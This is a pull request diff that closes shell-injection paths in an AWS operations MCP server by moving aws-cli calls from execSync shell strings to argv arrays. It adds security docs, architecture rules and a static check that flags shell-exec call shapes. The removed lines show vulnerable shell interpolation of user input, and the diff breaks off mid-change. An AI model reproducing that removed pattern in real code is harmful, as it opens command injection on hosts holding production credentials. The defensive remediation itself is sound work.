### PR TITLE
Close shell-injection paths in mcp/ops AWS CLI helpers (#763)

### DIFF
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -275,7 +275,7 @@ repos:
         name: architecture (adr guard fast)
         entry: python3 scripts/adr_guard/adr_guard.py --changed --level fast
         language: system
-        files: ^(docs/adr/|scripts/adr_guard/|\.github/workflows/|\.github/(CODEOWNERS|pull_request_template\.md|copilot-instructions\.md)$|\.claude/|shifter/shifter_platform/.*\.py$|shifter/engine/provisioner/cloud/.*\.py$|\.pre-commit-config\.yaml$|AGENTS\.md$|\.importlinter$|\.tflint\.hcl$|\.gitleaks\.toml$|\.kube-linter\.yaml$)
+        files: ^(docs/adr/|scripts/adr_guard/|\.github/workflows/|\.github/(CODEOWNERS|pull_request_template\.md|copilot-instructions\.md)$|\.claude/|shifter/shifter_platform/.*\.py$|shifter/engine/provisioner/cloud/.*\.py$|\.pre-commit-config\.yaml$|AGENTS\.md$|\.importlinter$|\.tflint\.hcl$|\.gitleaks\.toml$|\.kube-linter\.yaml$|mcp/.*\.(js|mjs|cjs)$)
         pass_filenames: false
         verbose: true
 

--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -409,6 +409,13 @@ repos:
         files: ^mcp/aws/
         pass_filenames: false
 
+      - id: test-mcp-ops
+        name: test (mcp/ops)
+        entry: bash -c 'cd mcp/ops && npm test'
+        language: system
+        files: ^mcp/ops/
+        pass_filenames: false
+
   # Shifter Platform tests (largest test suite - run last)
   - repo: local
     hooks:

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,32 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [3.95.16] - 2026-05-04
+
+### Security
+
+- **Closed shell-injection paths in `mcp/ops` (#763).** The shared
+  `aws()` and `awsText()` helpers, `getInstancePlatform`,
+  `fetchCredentials`, `ensureTunnel`, and `start_portal_test_tunnel`
+  previously interpolated user-controlled strings into shell command
+  strings and ran them via `execSync()`. Three documented payload
+  paths reached the host shell — `filter_log_events` (CloudWatch
+  filter pattern), `ssm_send_command` (SSM `--parameters` JSON), and
+  `run_manage_command` (Django management commands wrapped in JSON) —
+  with several other tools sharing the same unsafe abstraction.
+  Every aws-cli invocation in `mcp/ops/index.js` now goes through
+  argv-array helpers in `mcp/ops/lib.js` (`buildAwsArgv`, `awsExec`,
+  `awsJson`, `awsText`) backed by `spawnSync`, so payloads containing
+  `$()`, backticks, single and double quotes, semicolons, ampersands,
+  pipes, spaces, and newlines are forwarded as literal argv elements
+  rather than evaluated by the local shell. `child_process.execSync`
+  is no longer imported from `mcp/ops/index.js`. Regression coverage
+  in `mcp/ops/lib.test.js` (argv-builder and runner-injected
+  `awsExec`) and `mcp/ops/spawn-roundtrip.test.js` (proves Node's
+  `spawnSync` preserves literal argv across all metacharacters)
+  guards the new boundary. Component-local guardrails recorded in
+  `mcp/ops/SECURITY.md`.
+
 ## [3.95.15] - 2026-05-03
 
 ### Changed

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -38,6 +38,11 @@ Current mechanisms:
 - `.gitleaks.toml`: secret scanning configuration
 - `.kube-linter.yaml`: Kubernetes security and best-practice linting
   configuration (enforces ADR-006 checks)
+- `scripts/adr_guard/adr_guard.py` `mcp-no-shell-exec` check:
+  flags any file under `mcp/` (`.js`, `.mjs`, `.cjs`) that imports
+  `execSync` from `child_process` or `node:child_process`, including
+  the CommonJS `require` form. Enforces ADR-010-R1; current
+  exception covers `mcp/ngfw/*` until the deferred migration lands.
 
 ## Adding A Rule
 

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -46,12 +46,13 @@ Current mechanisms:
   `execSync(...)`, `exec(...)`, an `execSync as <alias>` rename
   used as `<alias>(`, or `spawn`/`spawnSync`/`execFile`/
   `execFileSync` invoked with `{ shell: true }`. String literals
-  and comments are flattened to whitespace via a single combined
-  regex (one alternation match per literal/comment, replaced with
-  whitespace and preserved newlines) so `"https://..."` URLs do not
-  accidentally erase a real call site, and so commented-out call
-  sites or strings containing `execSync as run` do not trip the
-  check or synthesise fake aliases. The check is a cheap pre-commit
+  and comments are flattened to whitespace by a small per-state
+  consumer (one helper per state — code / line-comment /
+  block-comment / string, preserving newlines), so
+  `"https://..."` URLs do not accidentally erase a real call site,
+  and so commented-out call sites or strings containing
+  `execSync as run` do not trip the check or synthesise fake
+  aliases. The check is a cheap pre-commit
   backstop; motivated bypasses such as `const run = cp.execSync;
   run(...)` are outside its reach by design and rely on code
   review. Enforces ADR-010-R1; current exception covers

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -42,9 +42,16 @@ Current mechanisms:
   flags any file under `mcp/` (`.js`, `.mjs`, `.cjs`) that BOTH
   imports `child_process` (any shape — named, default, namespace,
   CommonJS destructure, or bare-`require` property access, with or
-  without the `node:` prefix) AND contains a non-comment
-  `execSync(...)` call site. Enforces ADR-010-R1; current exception
-  covers `mcp/ngfw/*` until the deferred migration lands.
+  without the `node:` prefix) AND contains an `execSync(...)` call
+  site (or an `execSync as <alias>` ESM rename used as `<alias>(`).
+  String literals and comments are flattened to whitespace before the
+  call-site scan so `"https://..."` URLs cannot accidentally erase a
+  real call site, and so commented-out call sites cannot false-
+  positive trip the check. The check is a cheap pre-commit backstop;
+  motivated bypasses such as `const run = cp.execSync; run(...)` are
+  outside its reach by design and rely on code review. Enforces
+  ADR-010-R1; current exception covers `mcp/ngfw/*` until the
+  deferred migration lands.
 
 ## Adding A Rule
 

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -39,17 +39,20 @@ Current mechanisms:
 - `.kube-linter.yaml`: Kubernetes security and best-practice linting
   configuration (enforces ADR-006 checks)
 - `scripts/adr_guard/adr_guard.py` `mcp-no-shell-exec` check:
-  flags any file under `mcp/` (`.js`, `.mjs`, `.cjs`) that BOTH
-  imports `child_process` (any shape — named, default, namespace,
-  CommonJS destructure, or bare-`require` property access, with or
-  without the `node:` prefix) AND contains an `execSync(...)` call
-  site (or an `execSync as <alias>` ESM rename used as `<alias>(`).
-  String literals and comments are flattened to whitespace before the
-  call-site scan so `"https://..."` URLs cannot accidentally erase a
-  real call site, and so commented-out call sites cannot false-
-  positive trip the check. The check is a cheap pre-commit backstop;
-  motivated bypasses such as `const run = cp.execSync; run(...)` are
-  outside its reach by design and rely on code review. Enforces
+  flags any file under `mcp/` (`.js`, `.mjs`, `.cjs`) that imports
+  `child_process` (any shape — named, default, namespace, CommonJS
+  destructure, or bare-`require` property access, with or without
+  the `node:` prefix) AND uses one of the shell-string call shapes:
+  `execSync(...)`, `exec(...)`, an `execSync as <alias>` rename
+  used as `<alias>(`, or `spawn`/`spawnSync`/`execFile`/
+  `execFileSync` invoked with `{ shell: true }`. String literals
+  and comments are flattened to whitespace before the call-site
+  scan so `"https://..."` URLs do not accidentally erase a real
+  call site, and so commented-out call sites or strings containing
+  `execSync as run` do not trip the check or synthesise fake
+  aliases. The check is a cheap pre-commit backstop; motivated
+  bypasses such as `const run = cp.execSync; run(...)` are outside
+  its reach by design and rely on code review. Enforces
   ADR-010-R1; current exception covers `mcp/ngfw/*` until the
   deferred migration lands.
 

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -46,15 +46,16 @@ Current mechanisms:
   `execSync(...)`, `exec(...)`, an `execSync as <alias>` rename
   used as `<alias>(`, or `spawn`/`spawnSync`/`execFile`/
   `execFileSync` invoked with `{ shell: true }`. String literals
-  and comments are flattened to whitespace before the call-site
-  scan so `"https://..."` URLs do not accidentally erase a real
-  call site, and so commented-out call sites or strings containing
-  `execSync as run` do not trip the check or synthesise fake
-  aliases. The check is a cheap pre-commit backstop; motivated
-  bypasses such as `const run = cp.execSync; run(...)` are outside
-  its reach by design and rely on code review. Enforces
-  ADR-010-R1; current exception covers `mcp/ngfw/*` until the
-  deferred migration lands.
+  and comments are flattened to whitespace via a single combined
+  regex (one alternation match per literal/comment, replaced with
+  whitespace and preserved newlines) so `"https://..."` URLs do not
+  accidentally erase a real call site, and so commented-out call
+  sites or strings containing `execSync as run` do not trip the
+  check or synthesise fake aliases. The check is a cheap pre-commit
+  backstop; motivated bypasses such as `const run = cp.execSync;
+  run(...)` are outside its reach by design and rely on code
+  review. Enforces ADR-010-R1; current exception covers
+  `mcp/ngfw/*` until the deferred migration lands.
 
 ## Adding A Rule
 

--- a/docs/adr/README.md
+++ b/docs/adr/README.md
@@ -39,10 +39,12 @@ Current mechanisms:
 - `.kube-linter.yaml`: Kubernetes security and best-practice linting
   configuration (enforces ADR-006 checks)
 - `scripts/adr_guard/adr_guard.py` `mcp-no-shell-exec` check:
-  flags any file under `mcp/` (`.js`, `.mjs`, `.cjs`) that imports
-  `execSync` from `child_process` or `node:child_process`, including
-  the CommonJS `require` form. Enforces ADR-010-R1; current
-  exception covers `mcp/ngfw/*` until the deferred migration lands.
+  flags any file under `mcp/` (`.js`, `.mjs`, `.cjs`) that BOTH
+  imports `child_process` (any shape — named, default, namespace,
+  CommonJS destructure, or bare-`require` property access, with or
+  without the `node:` prefix) AND contains a non-comment
+  `execSync(...)` call site. Enforces ADR-010-R1; current exception
+  covers `mcp/ngfw/*` until the deferred migration lands.
 
 ## Adding A Rule
 

--- a/docs/adr/exceptions.yaml
+++ b/docs/adr/exceptions.yaml
@@ -20,7 +20,15 @@
     "owner": "platform",
     "reason": "mcp/ngfw still uses execSync with shell-string aws-cli invocations. Migration tracked separately; #763 only landed mcp/ops.",
     "expires_on": "2026-08-01",
+    "checks": ["mcp-no-shell-exec"],
+    "paths": ["mcp/ngfw/*"]
+  },
+  {
+    "rule_id": "ADR-010-R2",
+    "owner": "platform",
+    "reason": "mcp/ngfw embeds aws-cli --parameters JSON inside shell strings; same migration as ADR-010-R1. R1 exception covers the static check; R2 explicitly captures the JSON-payload exception until ngfw moves to argv arrays.",
+    "expires_on": "2026-08-01",
     "checks": [],
-    "paths": ["mcp/ngfw/"]
+    "paths": ["mcp/ngfw/*"]
   }
 ]

--- a/docs/adr/exceptions.yaml
+++ b/docs/adr/exceptions.yaml
@@ -14,5 +14,13 @@
     "expires_on": "2026-07-08",
     "checks": [],
     "paths": ["platform/k8s/gcp/base/"]
+  },
+  {
+    "rule_id": "ADR-010-R1",
+    "owner": "platform",
+    "reason": "mcp/ngfw still uses execSync with shell-string aws-cli invocations. Migration tracked separately; #763 only landed mcp/ops.",
+    "expires_on": "2026-08-01",
+    "checks": [],
+    "paths": ["mcp/ngfw/"]
   }
 ]

--- a/docs/adr/index.yaml
+++ b/docs/adr/index.yaml
@@ -256,8 +256,8 @@
     "rules": [
       {
         "id": "ADR-010-R1",
-        "description": "MCP servers must not pass externally-controlled values into a shell command string. AWS CLI invocations run through argv-array helpers (e.g. mcp/ops/lib.js buildAwsArgv/awsExec/awsJson/awsText).",
-        "checks": []
+        "description": "MCP servers must not import execSync from child_process; AWS CLI invocations run through argv-array helpers (e.g. mcp/ops/lib.js buildAwsArgv/awsExec/awsJson/awsText).",
+        "checks": ["mcp-no-shell-exec"]
       },
       {
         "id": "ADR-010-R2",
@@ -266,13 +266,14 @@
       }
     ],
     "exceptions": [],
-    "enforcement": ["agent-policy"],
+    "enforcement": ["agent-policy", "pre-commit", "ci"],
     "evidence": [
       "mcp/ops/SECURITY.md",
       "mcp/ops/lib.js",
       "mcp/ops/index.js",
       "mcp/ops/lib.test.js",
-      "mcp/ops/spawn-roundtrip.test.js"
+      "mcp/ops/spawn-roundtrip.test.js",
+      "scripts/adr_guard/adr_guard.py"
     ]
   },
   {

--- a/docs/adr/index.yaml
+++ b/docs/adr/index.yaml
@@ -248,6 +248,34 @@
     ]
   },
   {
+    "id": "ADR-010",
+    "title": "MCP servers invoke external CLIs via argv arrays, never shell strings",
+    "status": "accepted",
+    "scope": "repository",
+    "decision": "Every MCP server (mcp/*) that shells out to an external CLI (aws, kubectl, gcloud, docker, etc.) executes the binary via spawn/spawnSync/execFile with an argv array. Shell strings concatenated into execSync are forbidden. Tool-argument values that must be interpreted as remote shell content (e.g. ssm send-command --parameters) ride as a single argv element, not as a quoted shell substring.",
+    "rules": [
+      {
+        "id": "ADR-010-R1",
+        "description": "MCP servers must not pass externally-controlled values into a shell command string. AWS CLI invocations run through argv-array helpers (e.g. mcp/ops/lib.js buildAwsArgv/awsExec/awsJson/awsText).",
+        "checks": []
+      },
+      {
+        "id": "ADR-010-R2",
+        "description": "JSON payloads for CLI parameters (e.g. ssm send-command --parameters) are JSON.stringify'd into a single argv element. Shell escaping is not an acceptable remediation strategy for command-execution boundaries.",
+        "checks": []
+      }
+    ],
+    "exceptions": [],
+    "enforcement": ["agent-policy"],
+    "evidence": [
+      "mcp/ops/SECURITY.md",
+      "mcp/ops/lib.js",
+      "mcp/ops/index.js",
+      "mcp/ops/lib.test.js",
+      "mcp/ops/spawn-roundtrip.test.js"
+    ]
+  },
+  {
     "id": "ADR-009",
     "title": "AWS and GCP keep provider-specific identity stacks behind a shared auth seam",
     "status": "accepted",

--- a/mcp/ops/SECURITY.md
+++ b/mcp/ops/SECURITY.md
@@ -1,0 +1,43 @@
+# shifter-ops MCP command execution guardrails
+
+The ops MCP server runs with the local operator's AWS credentials and can
+reach production-facing AWS APIs. Treat every tool argument as untrusted,
+including strings that are later embedded in AWS CLI JSON parameters.
+
+## AWS CLI execution
+
+- AWS CLI helpers must execute `aws` with an argument array via
+  `spawn`, `spawnSync`, or `execFile`, never by interpolating a shell command
+  string.
+- Shared AWS helpers should accept structured argv segments, not a pre-joined
+  command string. Call sites should pass JSON values as a single argv element
+  after `JSON.stringify`.
+- Shell escaping is not a remediation strategy for this component. If a value
+  must be interpreted by a remote shell through SSM, keep that interpretation
+  isolated to the remote command payload and do not route it through the local
+  MCP host shell.
+- Do not add a second AWS command builder. Extend the shared helpers so all
+  CloudWatch, EC2, ECS, SSM, Secrets Manager, RDS, and S3 call sites share the
+  same local no-shell behavior.
+
+## Validation and boundaries
+
+- Reuse the existing Zod schemas in `index.js` for tool input shape and the
+  shared helpers in `lib.js` for domain-specific constraints such as
+  `resolveLogGroup`, `buildInstanceFilters`, `getSsmDocument`,
+  `validateManageCommand`, `MAX_S3_READ_SIZE`, and `isBinaryContentType`.
+- Validation is defense in depth, not the primary boundary against local shell
+  injection. Do not rely on allowlists such as `SafePath` or management-command
+  filtering to make shell string execution safe.
+- Keep database SQL protections separate from AWS process execution. The
+  `FORBIDDEN_PATTERN` and parameterized SQL helpers are SQL safety controls,
+  not command-execution controls.
+
+## Regression coverage
+
+Regression tests for AWS command construction should prove that payloads
+containing `$()`, backticks, single quotes, double quotes, semicolons, spaces,
+and newlines remain literal argv values and are never evaluated by the local
+shell. Cover each user-facing tool path that reaches the shared AWS helpers,
+especially CloudWatch filters, SSM command parameters, management-command SSM
+payloads, and S3 bucket/key inputs.

--- a/mcp/ops/index.js
+++ b/mcp/ops/index.js
@@ -3,7 +3,7 @@
 import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
 import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
 import { z } from "zod";
-import { execSync, spawn } from "child_process";
+import { spawn } from "child_process";
 import pg from "pg";
 import net from "net";
 import {
@@ -20,6 +20,8 @@ import {
   MAX_S3_READ_SIZE,
   isBinaryContentType,
   validateManageCommand,
+  awsJson,
+  awsText as awsTextLib,
 } from "./lib.js";
 
 const { Pool } = pg;
@@ -35,23 +37,30 @@ function getProfile(env) {
 
 // ==========================================================================
 // AWS helpers
+//
+// All aws-cli invocations go through these wrappers, which delegate to
+// the argv-array helpers in lib.js. Callers MUST pass `args` as an
+// array of argv elements — never as a shell string. The lib helpers
+// throw TypeError if a string slips through.
 // ==========================================================================
 
 function aws(profile, args) {
-  const cmd = `aws ${args} --profile "${profile}" --region "${REGION}" --output json`;
-  return JSON.parse(execSync(cmd, { encoding: "utf-8", timeout: 60000 }));
+  return awsJson(profile, args);
 }
 
 function awsText(profile, args) {
-  const cmd = `aws ${args} --profile "${profile}" --region "${REGION}"`;
-  return execSync(cmd, { encoding: "utf-8", timeout: 60000 }).trim();
+  return awsTextLib(profile, args);
 }
 
 function getInstancePlatform(profile, instanceId) {
-  return awsText(
-    profile,
-    `ec2 describe-instances --instance-ids "${instanceId}" --query "Reservations[0].Instances[0].PlatformDetails"`,
-  );
+  return awsText(profile, [
+    "ec2",
+    "describe-instances",
+    "--instance-ids",
+    instanceId,
+    "--query",
+    "Reservations[0].Instances[0].PlatformDetails",
+  ]);
 }
 
 function ok(text) {
@@ -97,12 +106,22 @@ async function fetchCredentials(env) {
   const profile = getProfile(env);
   const secretId = `shifter-${env}-portal-db-credentials`;
 
-  const result = execSync(
-    `aws secretsmanager get-secret-value --secret-id "${secretId}" --region "${REGION}" --profile "${profile}" --query SecretString --output text`,
-    { encoding: "utf-8", timeout: 30000 }
+  const result = awsTextLib(
+    profile,
+    [
+      "secretsmanager",
+      "get-secret-value",
+      "--secret-id",
+      secretId,
+      "--query",
+      "SecretString",
+      "--output",
+      "text",
+    ],
+    { timeoutMs: 30000 }
   );
 
-  credentials[env] = JSON.parse(result.trim());
+  credentials[env] = JSON.parse(result);
   return credentials[env];
 }
 
@@ -125,20 +144,39 @@ async function ensureTunnel(env) {
 
   const profile = getProfile(env);
 
-  const instanceId = execSync(
-    `aws ec2 describe-instances --filters "Name=tag:Name,Values=${env}-portal-ec2" "Name=instance-state-name,Values=running" --query "Reservations[0].Instances[0].InstanceId" --output text --region "${REGION}" --profile "${profile}"`,
-    { encoding: "utf-8", timeout: 30000 }
-  ).trim();
+  const instanceId = awsTextLib(
+    profile,
+    [
+      "ec2",
+      "describe-instances",
+      "--filters",
+      `Name=tag:Name,Values=${env}-portal-ec2`,
+      "Name=instance-state-name,Values=running",
+      "--query",
+      "Reservations[0].Instances[0].InstanceId",
+      "--output",
+      "text",
+    ],
+    { timeoutMs: 30000 }
+  );
 
   if (!instanceId || instanceId === "None") {
     throw new Error(`Could not find running ${env} portal EC2 instance`);
   }
 
   const jmesQuery = `DBInstances[?DBInstanceIdentifier==\`${env}-portal-db\`].Endpoint.Address`;
-  const rdsHost = execSync(
-    `aws rds describe-db-instances --region "${REGION}" --profile "${profile}" --query '${jmesQuery}' --output text`,
-    { encoding: "utf-8", timeout: 30000 }
-  ).trim();
+  const rdsHost = awsTextLib(
+    profile,
+    [
+      "rds",
+      "describe-db-instances",
+      "--query",
+      jmesQuery,
+      "--output",
+      "text",
+    ],
+    { timeoutMs: 30000 }
+  );
 
   if (!rdsHost || rdsHost === "None") {
     throw new Error(`Could not find RDS endpoint for ${env}`);
@@ -263,7 +301,7 @@ const EnvSchema = z
   .default("dev")
   .describe("Environment (dev or prod). Defaults to dev.");
 
-// Input validation patterns — prevent shell injection in execSync calls
+// Input validation patterns — defense in depth on top of argv-array AWS execution
 const Ec2Id = z
   .string()
   .regex(/^i-[0-9a-f]{8,17}$/, "Must be a valid EC2 instance ID");
@@ -308,10 +346,17 @@ server.tool(
     try {
       const profile = getProfile(env);
       const logGroup = resolveLogGroup(component, env);
-      const result = aws(
-        profile,
-        `logs describe-log-streams --log-group-name "${logGroup}" --order-by LastEventTime --descending --limit ${limit}`
-      );
+      const result = aws(profile, [
+        "logs",
+        "describe-log-streams",
+        "--log-group-name",
+        logGroup,
+        "--order-by",
+        "LastEventTime",
+        "--descending",
+        "--limit",
+        String(limit),
+      ]);
       const streams = result.logStreams.map((s) => ({
         name: s.logStreamName,
         lastEvent: s.lastEventTimestamp
@@ -344,10 +389,16 @@ server.tool(
     try {
       const profile = getProfile(env);
       const logGroup = resolveLogGroup(component, env);
-      const result = aws(
-        profile,
-        `logs get-log-events --log-group-name "${logGroup}" --log-stream-name "${stream_name}" --limit ${limit}`
-      );
+      const result = aws(profile, [
+        "logs",
+        "get-log-events",
+        "--log-group-name",
+        logGroup,
+        "--log-stream-name",
+        stream_name,
+        "--limit",
+        String(limit),
+      ]);
       const lines = result.events.map(
         (e) => `[${new Date(e.timestamp).toISOString()}] ${e.message}`
       );
@@ -381,10 +432,16 @@ server.tool(
     try {
       const profile = getProfile(env);
       const logGroup = resolveLogGroup(component, env);
-      const result = aws(
-        profile,
-        `logs filter-log-events --log-group-name "${logGroup}" --filter-pattern ${JSON.stringify(filter_pattern)} --limit ${limit}`
-      );
+      const result = aws(profile, [
+        "logs",
+        "filter-log-events",
+        "--log-group-name",
+        logGroup,
+        "--filter-pattern",
+        filter_pattern,
+        "--limit",
+        String(limit),
+      ]);
       const lines = result.events.map(
         (e) =>
           `[${new Date(e.timestamp).toISOString()}] [${e.logStreamName}] ${e.message}`
@@ -416,18 +473,31 @@ server.tool(
     try {
       const profile = getProfile(env);
       const logGroup = resolveLogGroup(component, env);
-      const streams = aws(
-        profile,
-        `logs describe-log-streams --log-group-name "${logGroup}" --order-by LastEventTime --descending --limit 1`
-      );
+      const streams = aws(profile, [
+        "logs",
+        "describe-log-streams",
+        "--log-group-name",
+        logGroup,
+        "--order-by",
+        "LastEventTime",
+        "--descending",
+        "--limit",
+        "1",
+      ]);
       if (!streams.logStreams || streams.logStreams.length === 0) {
         return ok("No log streams found.");
       }
       const streamName = streams.logStreams[0].logStreamName;
-      const result = aws(
-        profile,
-        `logs get-log-events --log-group-name "${logGroup}" --log-stream-name "${streamName}" --limit ${limit}`
-      );
+      const result = aws(profile, [
+        "logs",
+        "get-log-events",
+        "--log-group-name",
+        logGroup,
+        "--log-stream-name",
+        streamName,
+        "--limit",
+        String(limit),
+      ]);
       const lines = result.events.map(
         (e) => `[${new Date(e.timestamp).toISOString()}] ${e.message}`
       );
@@ -461,11 +531,14 @@ server.tool(
     try {
       const profile = getProfile(env);
       const filters = buildInstanceFilters({ name_filter, include_terminated });
-      const filtersJson = JSON.stringify(JSON.stringify(filters));
-      const result = aws(
-        profile,
-        `ec2 describe-instances --filters ${filtersJson} --query 'Reservations[].Instances[].{InstanceId:InstanceId,State:State.Name,Name:Tags[?Key==\`Name\`].Value|[0],PrivateIp:PrivateIpAddress,Type:InstanceType}'`
-      );
+      const result = aws(profile, [
+        "ec2",
+        "describe-instances",
+        "--filters",
+        JSON.stringify(filters),
+        "--query",
+        "Reservations[].Instances[].{InstanceId:InstanceId,State:State.Name,Name:Tags[?Key==`Name`].Value|[0],PrivateIp:PrivateIpAddress,Type:InstanceType}",
+      ]);
       return ok(JSON.stringify(result, null, 2));
     } catch (e) {
       return err(e);
@@ -483,10 +556,12 @@ server.tool(
   async ({ env, instance_id }) => {
     try {
       const profile = getProfile(env);
-      const result = aws(
-        profile,
-        `ec2 start-instances --instance-ids "${instance_id}"`
-      );
+      const result = aws(profile, [
+        "ec2",
+        "start-instances",
+        "--instance-ids",
+        instance_id,
+      ]);
       const state = result.StartingInstances?.[0]?.CurrentState?.Name;
       return ok(`Instance ${instance_id}: ${state}`);
     } catch (e) {
@@ -505,10 +580,12 @@ server.tool(
   async ({ env, instance_id }) => {
     try {
       const profile = getProfile(env);
-      const result = aws(
-        profile,
-        `ec2 stop-instances --instance-ids "${instance_id}"`
-      );
+      const result = aws(profile, [
+        "ec2",
+        "stop-instances",
+        "--instance-ids",
+        instance_id,
+      ]);
       const state = result.StoppingInstances?.[0]?.CurrentState?.Name;
       return ok(`Instance ${instance_id}: ${state}`);
     } catch (e) {
@@ -527,10 +604,12 @@ server.tool(
   async ({ env, instance_id }) => {
     try {
       const profile = getProfile(env);
-      const result = aws(
-        profile,
-        `ec2 terminate-instances --instance-ids "${instance_id}"`
-      );
+      const result = aws(profile, [
+        "ec2",
+        "terminate-instances",
+        "--instance-ids",
+        instance_id,
+      ]);
       const state =
         result.TerminatingInstances?.[0]?.CurrentState?.Name;
       return ok(`Instance ${instance_id}: ${state}`);
@@ -557,18 +636,23 @@ server.tool(
     try {
       const profile = getProfile(env);
       const clusterName = cluster || `${env}-portal`;
-      const tasks = aws(
-        profile,
-        `ecs list-tasks --cluster "${clusterName}"`
-      );
+      const tasks = aws(profile, [
+        "ecs",
+        "list-tasks",
+        "--cluster",
+        clusterName,
+      ]);
       if (!tasks.taskArns || tasks.taskArns.length === 0) {
         return ok(`No running tasks in cluster ${clusterName}.`);
       }
-      const arns = tasks.taskArns.map((a) => `"${a}"`).join(" ");
-      const details = aws(
-        profile,
-        `ecs describe-tasks --cluster "${clusterName}" --tasks ${arns}`
-      );
+      const details = aws(profile, [
+        "ecs",
+        "describe-tasks",
+        "--cluster",
+        clusterName,
+        "--tasks",
+        ...tasks.taskArns,
+      ]);
       const summary = details.tasks.map((t) => ({
         taskId: t.taskArn.split("/").pop(),
         status: t.lastStatus,
@@ -596,10 +680,14 @@ server.tool(
     try {
       const profile = getProfile(env);
       const clusterName = cluster || `${env}-portal`;
-      const result = aws(
-        profile,
-        `ecs describe-services --cluster "${clusterName}" --services "${service}"`,
-      );
+      const result = aws(profile, [
+        "ecs",
+        "describe-services",
+        "--cluster",
+        clusterName,
+        "--services",
+        service,
+      ]);
       const svc = result.services?.[0];
       if (!svc) return ok(`Service "${service}" not found in cluster ${clusterName}.`);
       const summary = {
@@ -646,10 +734,15 @@ server.tool(
     try {
       const profile = getProfile(env);
       const clusterName = cluster || `${env}-portal`;
-      const result = aws(
-        profile,
-        `ecs update-service --cluster "${clusterName}" --service "${service}" --force-new-deployment`,
-      );
+      const result = aws(profile, [
+        "ecs",
+        "update-service",
+        "--cluster",
+        clusterName,
+        "--service",
+        service,
+        "--force-new-deployment",
+      ]);
       const svc = result.service;
       const deployment = svc.deployments?.find((d) => d.status === "PRIMARY");
       return ok(
@@ -682,7 +775,7 @@ server.tool(
   async ({ env }) => {
     try {
       const profile = getProfile(env);
-      const result = aws(profile, `secretsmanager list-secrets`);
+      const result = aws(profile, ["secretsmanager", "list-secrets"]);
       const secrets = result.SecretList.map((s) => ({
         name: s.Name,
         lastChanged: s.LastChangedDate,
@@ -704,10 +797,12 @@ server.tool(
   async ({ env, secret_id }) => {
     try {
       const profile = getProfile(env);
-      const result = aws(
-        profile,
-        `secretsmanager get-secret-value --secret-id "${secret_id}"`
-      );
+      const result = aws(profile, [
+        "secretsmanager",
+        "get-secret-value",
+        "--secret-id",
+        secret_id,
+      ]);
       return ok(result.SecretString || "(binary secret)");
     } catch (e) {
       return err(e);
@@ -733,10 +828,16 @@ server.tool(
       const platform = getInstancePlatform(profile, instance_id);
       const docName = getSsmDocument(platform);
       const params = JSON.stringify({ commands: [command] });
-      const result = aws(
-        profile,
-        `ssm send-command --instance-ids "${instance_id}" --document-name ${docName} --parameters '${params}'`
-      );
+      const result = aws(profile, [
+        "ssm",
+        "send-command",
+        "--instance-ids",
+        instance_id,
+        "--document-name",
+        docName,
+        "--parameters",
+        params,
+      ]);
       const cmdId = result.Command.CommandId;
       return ok(
         `Command sent (${docName}). ID: ${cmdId}\nUse ssm_get_command_output to check results.`
@@ -758,10 +859,14 @@ server.tool(
   async ({ env, command_id, instance_id }) => {
     try {
       const profile = getProfile(env);
-      const result = aws(
-        profile,
-        `ssm get-command-invocation --command-id "${command_id}" --instance-id "${instance_id}"`
-      );
+      const result = aws(profile, [
+        "ssm",
+        "get-command-invocation",
+        "--command-id",
+        command_id,
+        "--instance-id",
+        instance_id,
+      ]);
       return ok(
         `Status: ${result.Status}\n\n--- stdout ---\n${result.StandardOutputContent}\n--- stderr ---\n${result.StandardErrorContent}`
       );
@@ -790,10 +895,21 @@ server.tool(
       }
 
       const profile = getProfile(env);
-      const instanceId = execSync(
-        `aws ec2 describe-instances --filters "Name=tag:Name,Values=${env}-portal-ec2" "Name=instance-state-name,Values=running" --query "Reservations[0].Instances[0].InstanceId" --output text --region "${REGION}" --profile "${profile}"`,
-        { encoding: "utf-8", timeout: 30000 }
-      ).trim();
+      const instanceId = awsTextLib(
+        profile,
+        [
+          "ec2",
+          "describe-instances",
+          "--filters",
+          `Name=tag:Name,Values=${env}-portal-ec2`,
+          "Name=instance-state-name,Values=running",
+          "--query",
+          "Reservations[0].Instances[0].InstanceId",
+          "--output",
+          "text",
+        ],
+        { timeoutMs: 30000 }
+      );
 
       if (!instanceId || instanceId === "None") {
         return err(new Error(`Could not find running ${env} portal EC2 instance`));
@@ -903,10 +1019,12 @@ server.tool(
     try {
       const profile = getProfile(env);
       const name = asg_name || `${env}-portal-asg`;
-      const result = aws(
-        profile,
-        `autoscaling describe-auto-scaling-groups --auto-scaling-group-names "${name}"`
-      );
+      const result = aws(profile, [
+        "autoscaling",
+        "describe-auto-scaling-groups",
+        "--auto-scaling-group-names",
+        name,
+      ]);
       const asg = result.AutoScalingGroups[0];
       if (!asg) return ok(`ASG ${name} not found.`);
       const summary = {
@@ -937,10 +1055,12 @@ server.tool(
   async ({ env, target_group_arn }) => {
     try {
       const profile = getProfile(env);
-      const result = aws(
-        profile,
-        `elbv2 describe-target-health --target-group-arn "${target_group_arn}"`
-      );
+      const result = aws(profile, [
+        "elbv2",
+        "describe-target-health",
+        "--target-group-arn",
+        target_group_arn,
+      ]);
       const targets = result.TargetHealthDescriptions.map((t) => ({
         id: t.Target.Id,
         port: t.Target.Port,
@@ -1162,11 +1282,14 @@ server.tool(
         { Name: "tag:shifter:range_id", Values: ["*"] },
         { Name: "instance-state-name", Values: ["running"] },
       ];
-      const filtersJson = JSON.stringify(JSON.stringify(filters));
-      const ec2Result = aws(
-        profile,
-        `ec2 describe-instances --filters ${filtersJson} --query 'Reservations[].Instances[].{InstanceId:InstanceId,State:State.Name,Name:Tags[?Key==\`Name\`].Value|[0],RangeId:Tags[?Key==\`shifter:range_id\`].Value|[0]}'`
-      );
+      const ec2Result = aws(profile, [
+        "ec2",
+        "describe-instances",
+        "--filters",
